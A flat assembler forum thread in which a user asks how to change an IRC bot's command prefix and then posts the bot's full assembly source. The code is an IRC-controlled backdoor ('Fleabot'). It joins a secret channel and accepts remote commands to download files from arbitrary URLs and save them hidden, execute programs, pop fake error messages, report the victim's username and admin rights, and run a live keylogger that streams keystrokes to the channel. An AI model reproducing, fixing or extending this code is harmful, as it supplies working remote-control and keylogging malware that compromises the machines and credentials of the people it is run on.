flat assembler
Message board for the users of flat assembler.

Index > Windows > IRC Bot Prefix Problem

Author
Thread Post new topic Reply to topic
Jesse Redick



Joined: 11 Jan 2011
Posts: 15
Jesse Redick
Hello everyone,

I've been trying to learn how to create an IRC bot in assembler from some old sources. Everything is going fine with my learning except that for a prefix problem.

The prefix for the bot is:

Code:
CommandPrefix equ "^^"    


And the length of the prefix is added with:

Code:
add eax, 2d    


I want to change the prefix to just "^", but I am having trouble with figuring out what "add eax" should be changed too for it to work. Or even if that is the best way to do it. Any help with this would be appreciated.

Here is what the original code looks like to get some idea:

Code:
include "win32ax.inc"

entry Bot

CommandPrefix   equ "^^"


section '.code' code readable executable

Bot:
invoke WSAStartup,0101h,WSAData

cmp eax, 0
jne Exit

invoke socket,AF_INET,SOCK_STREAM,0

cmp eax, -1
je Exit

mov dword [SocketDesc], eax

invoke inet_addr,IRCServer

mov dword [SockAddr_IP], eax

invoke htons,IRCPort

mov word [SockAddr_Port], ax

invoke connect,dword [SocketDesc],SockAddr,16d

cmp eax, 0
jne Exit

call GenerateNickname

invoke lstrcpy,SendBuffer,"NICK "

invoke lstrcat,SendBuffer,Nickname

call SendLine

invoke lstrcpy,SendBuffer,"USER "

invoke lstrcat,SendBuffer,Nickname

invoke lstrcat,SendBuffer," 8 * :"

invoke lstrcat,SendBuffer,Nickname

call SendLine

GetMotd:
call RecvLine
call HandlePing

mov ecx, 0

IsMotd:
cmp dword [ReturnBuffer + ecx], "MOTD"
je HaveMotd

cmp byte [ReturnBuffer + ecx], 0d
je GetMotd

inc ecx
jmp IsMotd

HaveMotd:
invoke lstrcpy,SendBuffer,"JOIN "

invoke lstrcat,SendBuffer,Channel

invoke lstrcat,SendBuffer," "

call SendLine

RecvCommand:
call RecvLine
call HandlePing

mov ecx, 0

IsCommand:
cmp word [ReturnBuffer + ecx], CommandPrefix
je HaveCommand

cmp byte [ReturnBuffer + ecx], 0
je RecvCommand

inc ecx
jmp IsCommand

HaveCommand:
mov ebx, ReturnBuffer
add ebx, ecx
add ebx, 2d                       ;add length of command prefix

invoke lstrcpy,CommandBuffer,ebx

call ExecuteCommand

jmp RecvCommand    
Post 11 Jun 2015, 18:29
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 17716
Location: In your JS exploiting you and your system
revolution
You want to change the length of CommandPrefix to one character. So my guess is you need to do this:
Code:
;...
cmp byte [ReturnBuffer + ecx], CommandPrefix ;change to byte comparison
;...
HaveCommand:
mov ebx, ReturnBuffer
add ebx, ecx
add ebx, 1                       ;add length of command prefix (one character)
;...    
BTW: You can also shorten the last part there to:
Code:
lea ebx,[ReturnBuffer + ecx + 1]    
Post 12 Jun 2015, 01:45
View user's profile Send private message Visit poster's website Reply with quote
Jesse Redick



Joined: 11 Jan 2011
Posts: 15
Jesse Redick
revolution wrote:
You want to change the length of CommandPrefix to one character. So my guess is you need to do this:
Code:
;...
cmp byte [ReturnBuffer + ecx], CommandPrefix ;change to byte comparison
;...
HaveCommand:
mov ebx, ReturnBuffer
add ebx, ecx
add ebx, 1                       ;add length of command prefix (one character)
;...    
BTW: You can also shorten the last part there to:
Code:
lea ebx,[ReturnBuffer + ecx + 1]    


Thanks for trying to help me out here. I changed it by one and it doesn't seem to work. I had thought that was the problem at first too. If you can think of anything else, let me know.

This has been a headache to get this thing working.

Here is the entire source in case I am missing something:

Code:
include "win32ax.inc"                                 ;equates, api's and macros making living easier

entry Bot                                                       ;define code start

IRCServer       equ "208.51.40.2", 0                                ;to this server we want to connect
IRCPort         equ 6667d                                       ;connect using this port
Channel         equ "#testtest", 0                                  ;channel name
ChannelPassword equ "test", 0                                   ;the channel password
CommandPrefix   equ "^^"                                        ;what indicate commands
BotPassword     equ "test", 0                                   ;bot password
CRLF            equ 10d, 13d                                    ;break


section '.data' data readable writeable                         ;here our datas will be stored
        Version                 db "Fleabot - a example IRC bot in asm", 0 ;identify bot version

        IsLocked                db 0d                           ;to check if bot is locked or not
        WSAData                 WSADATA                         ;used by WSAStartup, cleanup
        SocketDesc              dd ?                            ;socket descriptor is stored here
        SockAddr                dw AF_INET                      ;our sockaddr_in structure
          SockAddr_Port         dw ?                            ;here we save the port
          SockAddr_IP           dd ?                            ;here we save the ip
          SockAddr_Zero         rb 8d                           ;unused
        RandomString            rb 5d                           ;here we save a random string (a - z) for the nick
        Username                rb 36d                          ;here we store the user name for nick generation
        UsernameSize            dd 36d                          ;size of the buffer
        Nickname                rb 9d                           ;buffer for nickname
        SendBuffer              rb 512d                         ;the buffer where we store bytes to send
        ReturnBuffer            rb 512d                         ;the buffer where we story things to receive
        ByteBuffer              rb 2d                           ;for the RecvLine procedure
        Pong                    db "PONG "                      ;prefix pong message
        PongBuffer              rb 16d                          ;buffer for the pong message
        CommandBuffer           rb 128d                         ;buffer to store command and parameters
        Parameter1              rb 128d                         ;buffer for parameter 1
        Parameter2              rb 128d                         ;buffer for parameter 2
        InetHandle              dd ?                            ;handle for download command
        UrlHandle               dd ?                            ;handle for download command
        FileHandle              dd ?                            ;handle of open files
        ReadNext                dd ?                            ;how much else to download
        DownloadBuffer          rb 1024d                        ;downoad kb for kb
        BytesWritten            dd ?                            ;for writefile
        StartupInfo             STARTUPINFO                     ;for create process
        ProcessInfo             PROCESS_INFORMATION             ;for create process
        SystemDir               rb 256d                         ;buffer for system dir
        ThreadId                dd ?                            ;for creating live keylog thread
        ThreadHandle            dd ?                            ;store handle for thread
        ThreadExitCode          dd ?                            ;for terminating thread
        KeylogBuffer            rb 60d                          ;buffer for key strokes


section '.code' code readable executable                        ;code section
Bot:                                                            ;lets start
        invoke WSAStartup,\                                     ;initiates sockets DLL
                0101h,\                                         ;use version 1.1
                WSAData                                         ;pointer to wsadata strcuture

        cmp eax, 0                                              ;successful?
        jne Exit                                                ;if not exit bot

        invoke socket,\                                         ;create a socket
                AF_INET,\                                       ;family
                SOCK_STREAM,\                                   ;two way connection
                0                                               ;no particular protocol

        cmp eax, -1                                             ;successful?
        je Exit                                                 ;if not exit

        mov dword [SocketDesc], eax                             ;save socket descriptor

        invoke inet_addr,\                                      ;covert ip string to dword
                IRCServer                                       ;the ip as string

        mov dword [SockAddr_IP], eax                            ;save ip in sockaddr structure

        invoke htons,\                                          ;convert port to the network byte order
                IRCPort                                         ;the port

        mov word [SockAddr_Port], ax                            ;save it in the structure

        invoke connect,\                                        ;now connect to server
                dword [SocketDesc],\                            ;the socket descriptor
                SockAddr,\                                      ;pointer to the sockaddr structure
                16d                                             ;size of this structure

        cmp eax, 0                                              ;successful?
        jne Exit                                                ;if not exit

        call GenerateNickname                                   ;generate the nickname

        invoke lstrcpy,\                                        ;copy NICK to send buffer
                SendBuffer,\                                    ;pointer
                "NICK "                                         ;nick command

        invoke lstrcat,\                                        ;append the nickname
                SendBuffer,\                                    ;to this
                Nickname                                        ;from this

        call SendLine                                           ;send buffer to irc server

        invoke lstrcpy,\                                        ;copy USER to send buffer
                SendBuffer,\                                    ;to this
                "USER "                                         ;from this

        invoke lstrcat,\                                        ;append the nickname
                SendBuffer,\                                    ;to this
                Nickname                                        ;from this

        invoke lstrcat,\                                        ;append usermode
                SendBuffer,\                                    ;to this
                " 8 * :"                                        ;usermode

        invoke lstrcat,\                                        ;append nickname for user message
                SendBuffer,\                                    ;to this
                Nickname                                        ;from this

        call SendLine                                           ;send buffer to server

GetMotd:                                                        ;we can join when "MOTD" message is over
        call RecvLine                                           ;get a line from server
        call HandlePing                                         ;handle ping

        mov ecx, 0                                              ;clear counter

IsMotd:                                                         ;check for "MOTD"
        cmp dword [ReturnBuffer + ecx], "MOTD"                  ;is there "MOTD"?
        je HaveMotd                                             ;then we can join

        cmp byte [ReturnBuffer + ecx], 0d                       ;end of buffer?
        je GetMotd                                              ;check next line

        inc ecx                                                 ;ecx + 1
        jmp IsMotd                                              ;check next position

HaveMotd:                                                       ;now we can join
        invoke lstrcpy,\                                        ;copy JOIN to buffer
                SendBuffer,\                                    ;pointer
                "JOIN "                                         ;join command

        invoke lstrcat,\                                        ;append the channel
                SendBuffer,\                                    ;pointer
                Channel                                         ;channel name

        invoke lstrcat,\                                        ;append a space
                SendBuffer,\                                    ;pointer
                " "                                             ;space

        invoke lstrcat,\                                        ;append the channel password
                SendBuffer,\                                    ;pointer
                ChannelPassword                                 ;pass

        call SendLine                                           ;send to server

        invoke lstrcpy,\                                        ;copy MODE to buffer
                SendBuffer,\                                    ;pointer
                "MODE "                                         ;to set key

        invoke lstrcat,\                                        ;append channel
                SendBuffer,\                                    ;pointer
                Channel                                         ;channel name

        invoke lstrcat,\                                        ;append key mode and secret
                SendBuffer,\                                    ;buffer
                " +nsk "                                        ;no external message, secret, key

        invoke lstrcat,\                                        ;append the password aka key
                SendBuffer,\                                    ;pointer
                ChannelPassword                                 ;the pass

        call SendLine                                           ;send it to irc server

RecvCommand:                                                    ;check if received line include a command
        call RecvLine                                           ;get a line
        call HandlePing                                         ;handle ping if it is

        mov ecx, 0                                              ;set counter to zero

IsCommand:                                                      ;check if command
        cmp word [ReturnBuffer + ecx], CommandPrefix            ;is command prefix?
        je HaveCommand                                          ;then extract command

        cmp byte [ReturnBuffer + ecx], 0                        ;is end of line?
        je RecvCommand                                          ;then wait for next

        inc ecx                                                 ;increase counter by one
        jmp IsCommand                                           ;check next position

HaveCommand:                                                    ;extract command
        mov ebx, ReturnBuffer                                   ;pointer to buffer
        add ebx, ecx                                            ;add counter
        add ebx, 1d                                             ;add length of command prefix

        invoke lstrcpy,\                                        ;add to command buffer
                CommandBuffer,\                                 ;pointer
                ebx                                             ;points to command position

        call ExecuteCommand                                     ;execute command
        jmp RecvCommand                                         ;next command

Exit:
        invoke WSACleanup                                       ;cleanup the wsa

        invoke ExitProcess,\                                    ;exit program
                0                                               ;exit code


SendLine:                                                       ;this procedure sends a line to the irc server
        invoke lstrcat,\                                        ;append crlf to the send buffer
                SendBuffer,\                                    ;buffer
                CRLF                                            ;10d, 13d

        invoke lstrlen,\                                        ;get length of buffer
                SendBuffer                                      ;buffer

        invoke send,\                                           ;send this line
                dword [SocketDesc],\                            ;socket descriptor
                SendBuffer,\                                    ;send this
                eax,\                                           ;length of buffer
                0                                               ;no flags

        cmp eax, -1                                             ;succeddful?
        je Exit                                                 ;if not exit
ret                                                             ;return to call


RecvLine:                                                       ;this procedure receive a line from server
        mov dword [ReturnBuffer], 0                             ;clear the buffer

GetLine:                                                        ;recv until crlf
        invoke recv,\                                           ;receive a byte
                dword [SocketDesc],\                            ;socket descriptor
                ByteBuffer,\                                      ;1 byte buffer
                1d,\                                            ;get just one byte
                0                                               ;no flags

        cmp eax, 0                                              ;error?
        je Exit                                                 ;if so, exit

        cmp byte [ByteBuffer], 10d                              ;arrived crlf?
        je HaveLine                                             ;then return

        invoke lstrcat,\                                        ;append byte to buffer
                ReturnBuffer,\                                  ;pointer
                ByteBuffer                                      ;the byte

        jmp GetLine                                             ;receive next byte

HaveLine:                                                       ;we have a line and can..
ret                                                             ;...return


GenerateNickname:                                               ;this procedure generates a random nick
        mov ecx, 0                                              ;clear counter

GetByte:                                                        ;get a single byte
        invoke GetTickCount                                     ;get the run time

        cmp al, 97d                                             ;after "a"
        jnb CheckBelow                                          ;if so, check if its before "z"

        jmp Sleep33                                             ;sleep 33 ms

CheckBelow:
        cmp al, 122d                                            ;before "z"
        jna HaveByte                                            ;then save byte

        jmp Sleep33                                             ;sleep 33 ms

HaveByte:                                                       ;save a byte
        mov byte [RandomString + ecx], al                       ;save byte at the position
        inc ecx                                                 ;ecx + 1

        cmp ecx, 4d                                             ;got 4 bytes?
        je GenerateIt                                           ;now generate it

Sleep33:                                                        ;sleep 33ms and try again to get a byte a - z
        push ecx                                                ;push counter

        invoke Sleep,\                                          ;sleep
                33d                                             ;33ms

        pop ecx                                                 ;restore counter

        jmp GetByte                                             ;try to get a byte a -z

GenerateIt:                                                     ;have random string, now create nick
        invoke GetUserName,\                                    ;get the logged on user name
                Username,\                                      ;pointer to buffer
                UsernameSize                                    ;size of buffer

        cmp eax, 0                                              ;successful?
        jne ExtractUserName                                     ;if so jump there

        mov dword [Username], "rrlf"                            ;no user name got, fill it with text anyways

ExtractUserName:                                                ;get 4 bytes from the user name
        mov byte [Username + 4d], 0                             ;set string end at 5th position

        invoke lstrcpy,\                                        ;copy username to nick buffer
                Nickname,\                                      ;pointer to buffer
                Username                                        ;pointer to buffer

        invoke lstrcat,\                                        ;append random string
                Nickname,\                                      ;to this
                RandomString                                    ;from this

        invoke CharLowerBuff,\                                  ;now mae nick to lower
                Nickname,\                                      ;the nick
                8d                                              ;length

ret                                                             ;return to call


HandlePing:                                                     ;this procedure handle ping and pong
        cmp dword [ReturnBuffer], "PING"                        ;is a ping?
        jne NoPing                                              ;if not return

        invoke lstrcpy,\                                        ;copy ping message to buffer
                PongBuffer,\                                    ;to this
                ReturnBuffer + 6d                               ;sendbuffer + "PING "

        invoke lstrcpy,\                                        ;copy PONG message to sendbuffer
                SendBuffer,\                                    ;buffer
                Pong                                            ;pong message

        call SendLine                                           ;send pong

NoPing:                                                         ;its not a ping
ret                                                             ;return

SendPrivmsg:                                                    ;send a message to channel
        invoke lstrcpy,\                                        ;copy PRIVMSG to send buffer
                SendBuffer,\                                    ;pointer
                "PRIVMSG "                                      ;irc command

        invoke lstrcat,\                                        ;append channel
                SendBuffer,\                                    ;pointer
                Channel                                         ;the chan

        invoke lstrcat,\                                        ;append space
                SendBuffer,\                                    ;pointer
                " :"                                            ;sepertor

        invoke lstrcat,\                                        ;append message
                SendBuffer,\                                    ;pointer
                ReturnBuffer                                    ;pointer

        call SendLine                                           ;send to server
ret                                                             ;return

ExecuteCommand:                                                 ;execute received command
        cmp dword [CommandBuffer], "unlo"                       ;is unlock command?
        je CmdUnlock                                            ;execute it

        cmp byte [IsLocked], 0                                  ;is bot locked?
        je BotLocked                                            ;jmp there

        cmp dword [CommandBuffer], "cmds"                       ;is commands command?
        je CmdCmds                                              ;then show commands

        cmp dword [CommandBuffer], "lock"                       ;is lock command?
        je CmdLock                                              ;lock it then

        cmp dword [CommandBuffer], "quit"                       ;is quit command?
        je CmdQuit                                              ;quit from irc, exit

        cmp dword [CommandBuffer], "raw "                       ;is raw command?
        je CmdRaw                                               ;execute raw irc command

        cmp word [CommandBuffer], "dl"                          ;is download command?
        je CmdDl                                                ;download file from http

        cmp dword [CommandBuffer], "exec"                       ;is execute command?
        je CmdExec                                              ;then execute application

        cmp dword [CommandBuffer], "vers"                       ;is version command?
        je CmdVersion                                           ;show it then

        cmp dword [CommandBuffer], "msgb"                       ;is msgbox command?
        je CmdMsgbox                                            ;show it then

        cmp dword [CommandBuffer], "info"                       ;is info command?
        je CmdInfo                                              ;then show informations about victim

        cmp dword [CommandBuffer], "live"                       ;is livelog command?
        je CmdLivelog                                           ;log it then

        cmp dword [CommandBuffer], "stop"                       ;is stoplog command?
        je CmdStoplog                                           ;stop it then

        invoke lstrcpy,\                                        ;unknown command
                ReturnBuffer,\                                  ;pointer
                "unknown command, type 'cmds' for commands"     ;mesage

        call SendPrivmsg                                        ;send to chan
        jmp ExecuteCommandReturn                                ;return

BotLocked:
        invoke lstrcpy,\                                        ;copy locked message to return buffer
                ReturnBuffer,\                                  ;pointer
                "bot is locked, use unlock <password>"          ;message

        call SendPrivmsg                                        ;send it
        jmp ExecuteCommandReturn                                ;return

CmdUnlock:                                                      ;unlock command
        invoke lstrlen,\                                        ;get password len
                BotPassword                                     ;of this

        inc eax                                                 ;eax + 1

        invoke lstrcpyn,\                                       ;copy password to parameter1 buffer
                Parameter1,\                                    ;pointer
                CommandBuffer + 7d,\                            ;skip "unlock "
                eax                                             ;dont copy the crlf

        invoke lstrcmp,\                                        ;compare password
                BotPassword,\                                   ;password
                Parameter1                                      ;received password

        cmp eax, 0                                              ;right pass?
        jne WrongPassword                                       ;if not send back wrong pass

        mov byte [IsLocked], 1d                                 ;set unlock code

        invoke lstrcpy,\                                        ;tell user bot is unlocked
                ReturnBuffer,\                                  ;buffer
                "bot now unlocked"                              ;message

        call SendPrivmsg                                        ;send to channel
        jmp ExecuteCommandReturn                                ;return

WrongPassword:
        invoke lstrcpy,\                                        ;copy wrong pass message
                ReturnBuffer,\                                  ;pointer
                "wrong password"                                ;message

        call SendPrivmsg                                        ;send to chan
        jmp ExecuteCommandReturn                                ;return

CmdCmds:                                                        ;show all comands
        invoke lstrcpy,\                                        ;copy unlock command
                ReturnBuffer,\                                  ;pointer to buffer
                "unlock <password>  -  unlock the bot"          ;message

        call SendPrivmsg                                        ;send it to channel

        invoke Sleep,\                                          ;sleep a second
                1000d                                           ;1 sec

        invoke lstrcpy,\                                        ;copy lock command
                ReturnBuffer,\                                  ;pointer to buffer
                "lock  -  lock the bot"                         ;message

        call SendPrivmsg                                        ;send it to channel

        invoke Sleep,\                                          ;sleep a second
                1000d                                           ;1 sec

        invoke lstrcpy,\                                        ;copy raw command
                ReturnBuffer,\                                  ;pointer to buffer
                "raw <irc command>  -  send irc command to server" ;message

        call SendPrivmsg                                        ;send it to channel

        invoke Sleep,\                                          ;sleep a second
                1000d                                           ;1 sec

        invoke lstrcpy,\                                        ;copy dl command
                ReturnBuffer,\                                  ;pointer to buffer
                "dl <http url> | <save as path>  -  download file from http" ;message

        call SendPrivmsg                                        ;send it to channel

        invoke Sleep,\                                          ;sleep a second
                1000d                                           ;1 sec

        invoke lstrcpy,\                                        ;copy exec command
                ReturnBuffer,\                                  ;pointer to buffer
                "exec <path>  -  execute a application"         ;message

        call SendPrivmsg                                        ;send it to channel

        invoke Sleep,\                                          ;sleep a second
                1000d                                           ;1 sec

        invoke lstrcpy,\                                        ;copy msgbox command
                ReturnBuffer,\                                  ;pointer to buffer
                "msgbox <title> | <message>  -  show fake error message" ;message

        call SendPrivmsg                                        ;send it to channel

        invoke Sleep,\                                          ;sleep a second
                1000d                                           ;1 sec

        invoke lstrcpy,\                                        ;copy info command
                ReturnBuffer,\                                  ;pointer to buffer
                "info  -  get username, system directory and is admin" ;message

        call SendPrivmsg                                        ;send it to channel

        invoke Sleep,\                                          ;sleep a second
                1000d                                           ;1 sec

        invoke lstrcpy,\                                        ;copy livelog command
                ReturnBuffer,\                                  ;pointer to buffer
                "livelog  -  start logging keys and send it to channel" ;message

        call SendPrivmsg                                        ;send it to channel

        invoke Sleep,\                                          ;sleep a second
                1000d                                           ;1 sec

        invoke lstrcpy,\                                        ;copy stoplog command
                ReturnBuffer,\                                  ;pointer to buffer
                "stoplog  -  stop logging keys" ;message

        call SendPrivmsg                                        ;send it to channel

        invoke Sleep,\                                          ;sleep a second
                1000d                                           ;1 sec

        invoke lstrcpy,\                                        ;copy cmds command
                ReturnBuffer,\                                  ;pointer to buffer
                "cmds  -  show available commands"              ;message

        call SendPrivmsg                                        ;send it to channel

        invoke lstrcpy,\                                        ;copy version command
                ReturnBuffer,\                                  ;pointer to buffer
                "version  -  show bot version"                  ;message

        call SendPrivmsg                                        ;send it to channel

        invoke Sleep,\                                          ;sleep a second
                1000d                                           ;1 sec

        invoke lstrcpy,\                                        ;copy quit command
                ReturnBuffer,\                                  ;pointer to buffer
                "quit  -  quit bot"                             ;message

        call SendPrivmsg                                        ;send it to channel

        invoke Sleep,\                                          ;sleep a second
                1000d                                           ;1 sec

        jmp ExecuteCommandReturn                                ;return

CmdLock:                                                        ;lock command
        mov byte [IsLocked], 0                                  ;set it as locked

        invoke lstrcpy,\                                        ;return message
                ReturnBuffer,\                                  ;buffer
                "bot now locked"                                ;message

        call SendPrivmsg                                        ;send it
        jmp ExecuteCommandReturn                                ;and return

CmdQuit:                                                        ;quit bot
        invoke lstrcpy,\                                        ;copy QUIT to buffer
                SendBuffer,\                                    ;pointer
                "QUIT"                                          ;quit command

        call SendLine                                           ;send it

        invoke Sleep,\                                          ;sleep
                2000d                                           ;2 seconds

        jmp Exit                                                ;exit bot

CmdRaw:                                                         ;send raw command to irc server
        invoke lstrcpy,\                                        ;copy command to buffer
                SendBuffer,\                                    ;buffer
                CommandBuffer + 4                               ;skip "raw "

        call SendLine                                           ;send it
        jmp ExecuteCommandReturn                                ;return

CmdDl:                                                          ;download file via http
        call ExtractParameters                                  ;get the two parameters

        invoke InternetOpen,\                                   ;initialise wininet
                Parameter1,\                                    ;use url as agent, not necessary
                0,\                                             ;get configs from registry (INTERNET_OPEN_TYPE_PRECONFIG)
                0,\                                             ;no proxy
                0,\                                             ;also no bypass
                0                                               ;no flags

        cmp eax, 0                                              ;error?
        je DownloadFileError                                    ;if so jump to error

        mov dword [InetHandle], eax                             ;save handle

        invoke InternetOpenUrl,\                                ;open the http url
                dword [InetHandle],\                            ;handle from internetopen
                Parameter1 + 3,\                                ;pointer to the url, pass "dl "
                0,\                                             ;no need for headers
                0,\                                             ;so are the length
                0,\                                             ;no specific flags
                0                                               ;no context needed

        cmp eax, 0                                              ;error?
        je DownloadFileError                                    ;then show error

        mov dword [UrlHandle], eax                              ;save handle

        invoke CreateFile,\                                     ;create the file for writing
                Parameter2,\                                    ;pointer to filename
                GENERIC_WRITE,\                                 ;we just want to write
                FILE_SHARE_WRITE,\                              ;write it
                0,\                                             ;security attributes, nohh
                CREATE_NEW,\                                    ;fail if file exist
                FILE_ATTRIBUTE_HIDDEN,\                         ;make it as hidden
                0                                               ;no template file

        cmp eax, 0                                              ;error?
        je DownloadFileError                                    ;send error back

        mov dword [FileHandle], eax                             ;save handle

        inc dword [ReadNext]                                    ;increase readnext by one

ReadNextBytes:                                                  ;read bytes by bytes
        cmp dword [ReadNext], 0                                 ;no more to read
        je DownloadComplete                                     ;then download complete

        invoke InternetReadFile,\                               ;read from the open url
                dword [UrlHandle],\                             ;open handle
                DownloadBuffer,\                                ;pointer to buffer
                1024d,\                                         ;bytes to read, kbyte by kbyte
                ReadNext                                        ;how much bytes readed?

        invoke WriteFile,\                                      ;write bytes to file
                dword [FileHandle],\                            ;open handle
                DownloadBuffer,\                                ;point to downloaded bytes
                dword [ReadNext],\                              ;write that much bytes
                BytesWritten,\                                  ;how much bytes are written
                0                                               ;no overlapped

        jmp ReadNextBytes                                       ;process next bytes

DownloadComplete:                                               ;download is complete
        invoke CloseHandle,\                                    ;close file
                dword [FileHandle]                              ;via handle

        invoke InternetCloseHandle,\                            ;close inet
                dword [UrlHandle]                               ;via handle

        invoke InternetCloseHandle,\                            ;again
                dword [InetHandle]                              ;via handle

        invoke lstrcpy,\                                        ;copy success message
                ReturnBuffer,\                                  ;to return buffer
                "download successful"                           ;message

        call SendPrivmsg                                        ;send to channel
        jmp ExecuteCommandReturn                                ;return

DownloadFileError:
        invoke lstrcpy,\                                        ;copy fail message
                ReturnBuffer,\                                  ;to return buffer
                "download failed"                               ;message

        call SendPrivmsg                                        ;send to channel
        jmp ExecuteCommandReturn                                ;return

CmdExec:                                                        ;execute a file
        invoke lstrlen,\                                        ;get length of buffer
                CommandBuffer                                   ;of this

        mov byte [CommandBuffer + eax - 1], 0                   ;clear the crlf

        invoke CreateProcess,\                                  ;via create process
                CommandBuffer + 5d,\                            ;application, skip "exec "
                CommandBuffer + 5d,\                            ;user
                0,\                                             ;no process attributes
                0,\                                             ;no thread attributes
                0,\                                             ;no inerhits
                CREATE_NEW_CONSOLE,\                            ;own process
                0,\                                             ;no environment
                0,\                                             ;nor current directory
                StartupInfo,\                                   ;startup structure
                ProcessInfo                                     ;process structure

        cmp eax, 0                                              ;error?
        je ExecError                                            ;show it then

        invoke lstrcpy,\                                        ;copy message
                ReturnBuffer,\                                  ;to this
                "successful executed"                           ;yehaw

        call SendPrivmsg                                        ;send to chan
        jmp ExecuteCommandReturn                                ;return

ExecError:                                                      ;error occured
        invoke lstrcpy,\                                        ;copy message
                ReturnBuffer,\                                  ;to this
                "execution failed"                              ;damn

        call SendPrivmsg                                        ;send to chan
        jmp ExecuteCommandReturn                                ;return

CmdVersion:                                                     ;show bot version
        invoke lstrcpy,\                                        ;copy version to buffer
                ReturnBuffer,\                                  ;pointer
                Version                                         ;from version

        call SendPrivmsg                                        ;send to channel
        jmp ExecuteCommandReturn                                ;return

CmdMsgbox:                                                      ;show a error message box
        call ExtractParameters                                  ;get two parameters

        invoke MessageBox,\                                     ;show messagbox, local
                0,\                                             ;no owner
                Parameter2,\                                    ;Text
                Parameter1 + 7d,\                               ;title, skip "msgbox "
                MB_ICONERROR                                    ;error style

        invoke lstrcpy,\                                        ;copy message
                ReturnBuffer,\                                  ;pointer
                "message box closed by user"                    ;message

        call SendPrivmsg                                        ;send to channeƶ
        jmp ExecuteCommandReturn                                ;return

CmdInfo:                                                        ;show informations
        invoke lstrcpy,\                                        ;copy "Username" to buffer
                ReturnBuffer,\                                  ;pointer
                "Username: "                                    ;msg

        invoke GetUserName,\                                    ;get user name
                Username,\                                      ;buffer
                UsernameSize                                    ;size

        invoke lstrcat,\                                        ;copy username
                ReturnBuffer,\                                  ;buffer
                Username                                        ;pointer

        invoke lstrcat,\                                        ;copy "sysdir"
                ReturnBuffer,\                                  ;to buffer
                ", System directory: "                          ;msg

        invoke GetSystemDirectory,\                             ;get sys dir to test
                SystemDir,\                                     ;buffer
                256d                                            ;size

        invoke lstrcat,\                                        ;copy to buffer
                ReturnBuffer,\                                  ;to buffer
                SystemDir                                       ;from here

        invoke lstrcat,\                                        ;append "admin"
                ReturnBuffer,\                                  ;buffer
                ", Admin: "

        invoke lstrcat,\                                        ;append filename to system dir
                SystemDir,\                                     ;to buffer
                "DiA.RRLF"                                      ;filename Wink

        invoke CreateFile,\                                     ;try to create this file
                SystemDir,\                                     ;file in system directory
                GENERIC_WRITE,\                                 ;check write
                FILE_SHARE_WRITE,\                              ;yeh
                0,\                                             ;no security attributes
                CREATE_ALWAYS,\                                 ;overwrite if exist
                FILE_ATTRIBUTE_HIDDEN,\                         ;as hidden
                0                                               ;no template file

        cmp eax, -1                                             ;error?
        je NoAdmin                                              ;then user is no admin

        invoke lstrcat,\                                        ;copy "yes"
                ReturnBuffer,\                                  ;to buffer
                "Yes"                                           ;message

        call SendPrivmsg                                        ;send to channel
        jmp ExecuteCommandReturn                                ;and return

NoAdmin:                                                        ;user is no admin
        invoke lstrcat,\                                        ;copy "no"
                ReturnBuffer,\                                  ;to buffer
                "No"                                            ;message

        call SendPrivmsg                                        ;send to channel
        jmp ExecuteCommandReturn                                ;and return

CmdLivelog:                                                     ;create a thread for live keylogging
        invoke CreateThread,\                                   ;create the keylog thread
                0,\                                             ;no security attributes
                0,\                                             ;default stack size
                LiveKeylog,\                                    ;procedure start
                0,\                                             ;no parameters
                0,\                                             ;start right now
                ThreadId                                        ;store here the thread id

        cmp eax, 0                                              ;error?
        je ThreadError                                          ;then jump there

        mov dword [ThreadHandle], eax                           ;store thread handle

        invoke lstrcpy,\                                        ;copy success message
                ReturnBuffer,\                                  ;to the buffer
                "live keylogging thread created"                ;yehaw

        call SendPrivmsg                                        ;send to channel
        jmp ExecuteCommandReturn                                ;ret

ThreadError:
        invoke lstrcpy,\                                        ;copy error message
                ReturnBuffer,\                                  ;to this
                "error on creating live keylogging thread"      ;buh

        call SendPrivmsg                                        ;send it
        jmp ExecuteCommandReturn                                ;return

CmdStoplog:                                                     ;stop keylogging thread
        invoke GetExitCodeThread,\                              ;get exit code to terminate thread
                dword [ThreadHandle],\                          ;thread handle
                ThreadExitCode                                  ;store it here

        invoke TerminateThread,\                                ;exit it now
                dword [ThreadHandle],\                          ;handle
                dword [ThreadExitCode]                          ;with this

        cmp eax, 0                                              ;error?
        je ExitThreadError                                      ;show it then

        mov dword [ThreadId], 0                                 ;clear id
        mov dword [ThreadHandle], 0                             ;clear handle
        mov dword [ThreadExitCode], 0                           ;clear exit code

        invoke lstrcpy,\                                        ;copy sucess message
                ReturnBuffer,\                                  ;to buffer
                "keylogging thread terminated"                  ;msg

        call SendPrivmsg                                        ;send it
        jmp ExecuteCommandReturn                                ;ret

ExitThreadError:                                                ;arghh, maybe not exist
        invoke lstrcpy,\                                        ;copy error message
                ReturnBuffer,\                                  ;to buffer
                "error terminating keylogging thread"           ;msg

        call SendPrivmsg                                        ;send it
        jmp ExecuteCommandReturn                                ;ret

ExecuteCommandReturn:                                           ;return
ret                                                             ;return to call


ExtractParameters:                                              ;this procedure extracts two parameter from a cmd
        mov edx, CommandBuffer                                  ;pointer to buffer
        mov ecx, 0                                              ;zero counter

FindCut:                                                        ;get the "|" cur
        cmp byte [edx + ecx], "|"                               ;is byte at position a "|"?
        je HaveCut                                              ;then extract it

        inc ecx                                                 ;counter + 1
        jmp FindCut                                             ;scan next position

HaveCut:                                                        ;have cut, extract it
        add edx, ecx                                            ;add counter to start of buffer
        mov byte [edx - 1], 0                                   ;zero the "|"
        add edx, 2d                                             ;skip space

        invoke lstrcpy,\                                        ;copy parameter2
                Parameter2,\                                    ;destination
                edx                                             ;source

        invoke lstrlen,\                                        ;get length to erase crlf
                Parameter2                                      ;of buffer

        mov byte [Parameter2 + eax - 1], 0                      ;erase crlf

        invoke lstrcpy,\                                        ;copy parameter1
                Parameter1,\                                    ;buffer
                CommandBuffer                                   ;source
ret                                                             ;return to call


LiveKeylog:                                                     ;this procedure logs keys and send it to channel
        invoke lstrlen,\                                        ;get legth of buffer
                KeylogBuffer                                    ;key strokes buffer

        cmp eax, 50d                                            ;is over 50 characters?
        jae SendKeyLine                                         ;then send it to channel

        mov ebx, 0                                              ;set counter to zero (just use ebx because api dont change it

NextKey:                                                        ;try if next key is pressed
        cmp ebx, 255d                                           ;end of possible keys?
        je LiveKeylog                                           ;the try from start again

        invoke GetAsyncKeyState,\                               ;get status of this key
                ebx                                             ;in ebx (0 - 255)

        cmp eax, -32767d                                        ;is pressed?
        jne ScanNextKey                                         ;if not check next possible key

        cmp ebx, 20h                                            ;VK_SPACE
